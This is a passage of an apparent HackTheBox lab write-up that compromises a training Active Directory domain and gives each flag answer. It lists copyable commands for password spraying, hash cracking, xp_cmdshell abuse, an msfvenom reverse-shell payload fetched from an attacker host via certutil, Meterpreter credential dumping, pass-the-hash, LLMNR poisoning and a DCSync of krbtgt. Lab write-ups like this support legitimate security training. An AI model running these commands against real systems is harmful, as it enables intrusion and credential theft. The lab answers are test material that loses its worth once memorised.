![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FTwMBUDlIVgfNfoBRywq4%252FScreenshot%2820%29.png%3Falt%3Dmedia%26token%3D3532a7f2-8577-4a72-8ac7-80d1eab5bb17&width=768&dpr=4&quality=100&sign=1100d366&sv=2) Next, let's downlaod the two files onto the sql server ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FwvvV7r8h6v5e0v9L6tbE%252FScreenshot%2821%29.png%3Falt%3Dmedia%26token%3D814c32db-fea5-4716-bca6-7c21f4d3e747&width=768&dpr=4&quality=100&sign=8cf353de&sv=2) Let's initiate the Meterpreter listener and proceed with the privilege escalation attack. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FemL8VP0UjpqCqRoWjUB7%252FScreenshot%2822%29.png%3Falt%3Dmedia%26token%3D4e66d2d8-d160-4507-bb1f-115d5ada034e&width=768&dpr=4&quality=100&sign=1b4ab371&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FdBdsJTLOqCGBFmvv71J3%252FScreenshot%2823%29.png%3Falt%3Dmedia%26token%3De3e10912-a97e-4efa-8ec4-cafd2275a9ca&width=768&dpr=4&quality=100&sign=c48591e0&sv=2) It is now time to retrieve the flag. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FSFVvjItId2humbMrsep4%252FScreenshot%2824%29.png%3Falt%3Dmedia%26token%3Dad49223f-502f-4be4-aad5-d23ba31e1b19&width=768&dpr=4&quality=100&sign=ebc2258e&sv=2) Answer: `s3imp3rs0nate_cl@ssic` Q8) Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. We now have system-level privileges on the SQL01 server; the next step is to attempt to retrieve the administrator's hash. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FzfxkPgLOMaJ2eAIhcG7D%252FScreenshot%2826%29.png%3Falt%3Dmedia%26token%3D3f0ebbd9-9bff-47d5-9e3f-78596eb28f12&width=768&dpr=4&quality=100&sign=547316b9&sv=2) Next, we will use this hash to attempt a connection to the MS01 server. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FpvMzUIyLMvKRQhC7GWwL%252FScreenshot%2827%29.png%3Falt%3Dmedia%26token%3D70f4cac6-0e9d-4fad-832c-e1ba22635db2&width=768&dpr=4&quality=100&sign=70d1232d&sv=2) Answer: `exc3ss1ve_adm1n_r1ights!` Q9) Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name? Let's proceed to download **PowerView.ps1** on **MS01** to enumerate Access Control Lists (ACLs). ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F2baVVGZBfB14crtEAfD2%252FScreenshot%288%29.png%3Falt%3Dmedia%26token%3D65573a10-2776-435b-9f69-1c3b191dade7&width=768&dpr=4&quality=100&sign=fc8be2b5&sv=2) I encountered an error while attempting this, so let's proceed using our Meterpreter session instead. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FPOv2TtJHD0RruWAyVDXI%252FScreenshot%289%29.png%3Falt%3Dmedia%26token%3Dddc75a0d-47b7-4618-adda-ec5fa13eb23b&width=768&dpr=4&quality=100&sign=25ce561a&sv=2) Let's apply a filter for the **GenericAll** permission. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FQUFwtK8X6HEOEMgVEvdl%252FScreenshot%2810%29.png%3Falt%3Dmedia%26token%3D9655bcc1-171c-43b0-82a2-d6303ac3bd8d&width=768&dpr=4&quality=100&sign=95bca95a&sv=2) Next, let'sconvert the security identifier (SID) to a username to identify the associated user. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fo0hM9zRiQ9RZ4nnkE7MQ%252FScreenshot%2811%29.png%3Falt%3Dmedia%26token%3D6ebcbf98-9df7-4746-b8ed-832994c39c08&width=768&dpr=4&quality=100&sign=8edc0bef&sv=2) Answer: `CT059` Q10) Crack this user's password hash and submit the cleartext password as your answer. For this task, we will use Inveigh on MS01 to conduct a man-in-the-middle attack in an attempt to capture the NTLM hash of the target user. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FMk1BFqfiYXOn91d69ma4%252FScreenshot%2812%29.png%3Falt%3Dmedia%26token%3D565e3a3b-947f-455f-ae7a-3dcddb91e3dc&width=768&dpr=4&quality=100&sign=955cc862&sv=2) Let's save this to a file and attempt to crack it using Hashcat. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FJZnpty2Qlv8IjPXkeRiZ%252FScreenshot%2813%29.png%3Falt%3Dmedia%26token%3D3f00b17e-c5d8-44ed-aec5-4ac17a64e425&width=768&dpr=4&quality=100&sign=a081565a&sv=2) Answer: `charlie1` Q11) Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host. The user **CT059** now has the **GenericAll** permission. Therefore, we can proceed to add this user to the **Domain Admins** group and initiate a **DCSync** attack. Let's configure the proxychains configuration file (`/etc/proxychains.conf`) on the Parrot host to route traffic through a SOCKS4 proxy on port 9050. This setup will allow us to authenticate to the MS01 machine via RDP using the credentials of the user **CT059**. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FF7BAMn2URV1F43IxfcDS%252FScreenshot%2814%29.png%3Falt%3Dmedia%26token%3Dc7af0263-419c-499d-9e6f-3affaecef4e9&width=768&dpr=4&quality=100&sign=142a7725&sv=2) Next, establish an SSH connection and create a SOCKS proxy on local port 9050. Let's now authenticate to the MS01 server via RDP using the credentials of user `**CT059**`. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fzmex5zMHCGRrFFLOqn14%252FScreenshot%2815%29.png%3Falt%3Dmedia%26token%3D76221e05-22a7-4872-8865-73c796a88745&width=768&dpr=4&quality=100&sign=aa32955&sv=2) Let's proceed to add this account to the Domain Admins group. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F1KRQll5YUureUCajJlaA%252FScreenshot%2816%29.png%3Falt%3Dmedia%26token%3D09368730-1840-4bfe-b022-27fc909f64b1&width=768&dpr=4&quality=100&sign=75af2291&sv=2) It is now time to migrate to DC01. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FpFQvEJna6f6IRrPRNU3A%252FScreenshot%2818%29.png%3Falt%3Dmedia%26token%3D037ecfd5-eb7a-432d-8f21-51a9d07bf9b2&width=768&dpr=4&quality=100&sign=7919405a&sv=2) Answer: `acLs_f0r_th3_w1n!` Q12) Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise. Now, let's authenticate to DC01 and execute a DCSync attack. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FD86ymLb60ayJpO9H4VZc%252FScreenshot%2819%29.png%3Falt%3Dmedia%26token%3D7df98e42-c114-428f-83d5-7b0706745c52&width=768&dpr=4&quality=100&sign=d29abc39&sv=2) Answer: `7eba70412d81c1cd030d72a3e8dbe05f` [PreviousAD Enumeration & Attacks - Skills Assessment Part I](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/ad-enumeration-and-attacks-skills-assessment-part-i) [NextSOC Hackthebox Notes & Labs](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs) Last updated 6 months ago Copy cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.7.3.txt Copy hashcat -m 5600 ab920_hash /usr/share/wordlists/rockyou.txt Copy fping -asgq 172.16.7.0/23 Copy sudo nmap -v -A -iL hosts.txt Copy crackmapexec smb 172.16.7.50 -u 'ab920' -p 'weasal' crackmapexec winrm 172.16.7.50 -u 'ab920' -p 'weasal' Copy evil-winrm -i 172.16.7.50 -u 'ab920' -p 'weasal' Copy sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee usernames.txt cat usernames.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt Copy kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1 Copy smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 Copy smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' Copy smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config Copy python3 /usr/local/bin/mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60 Copy EXEC xp_cmdshell 'whoami /priv' Copy msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe Copy xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe" xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/shell.exe C:\Users\Public\shell.exe" Copy use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 172.16.7.240 set LPORT 1335 Copy xp_cmdshell C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe Copy more C:\Users\administrator\Desktop\flag.txt Copy load kiwi lsa_dump_creds Copy evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99 Copy certutil.exe -urlcache -f http://172.16.7.240:8000/PowerView.ps1 .\PowerView.ps1 Import-Module .\PowerView.ps1 Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID Copy use exploit/windows/smb/psexec set lhost 172.16.7.240 set rhosts 172.16.7.50 set smbuser administrator set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99 exploit Copy Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID Copy Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID Copy Convert-SidtoName "S-1-5-21-3327542485-274640656-2609762496-4611" Copy certutil.exe -urlcache -f http://172.16.7.240:8000/Inveigh.ps1 .\Inveigh.ps1 Import-Module .\Inveigh.ps1 Invoke-Inveigh -NBNS Y LLMNR Y -ConsoleOutput Y -FileOutput Y Copy hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt Copy sudo nano /etc/proxychains.conf Copy ssh -D 9050 htb-student@10.129.221.33 Copy proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1 /d:inlanefreight.local /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/ Copy net group 'Domain Admins' ct059 /add /domain Copy $cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\CT059", (ConvertTo-SecureString "charlie1" -AsPlainText -Force)) Enter-PSSession -ComputerName DC01 -Credential $cred Copy psexec.py inlanefreight.local/CT059:charlie1@172.16.7.3 lsadump::dcsync /user:inlanefreight\krbtgt ---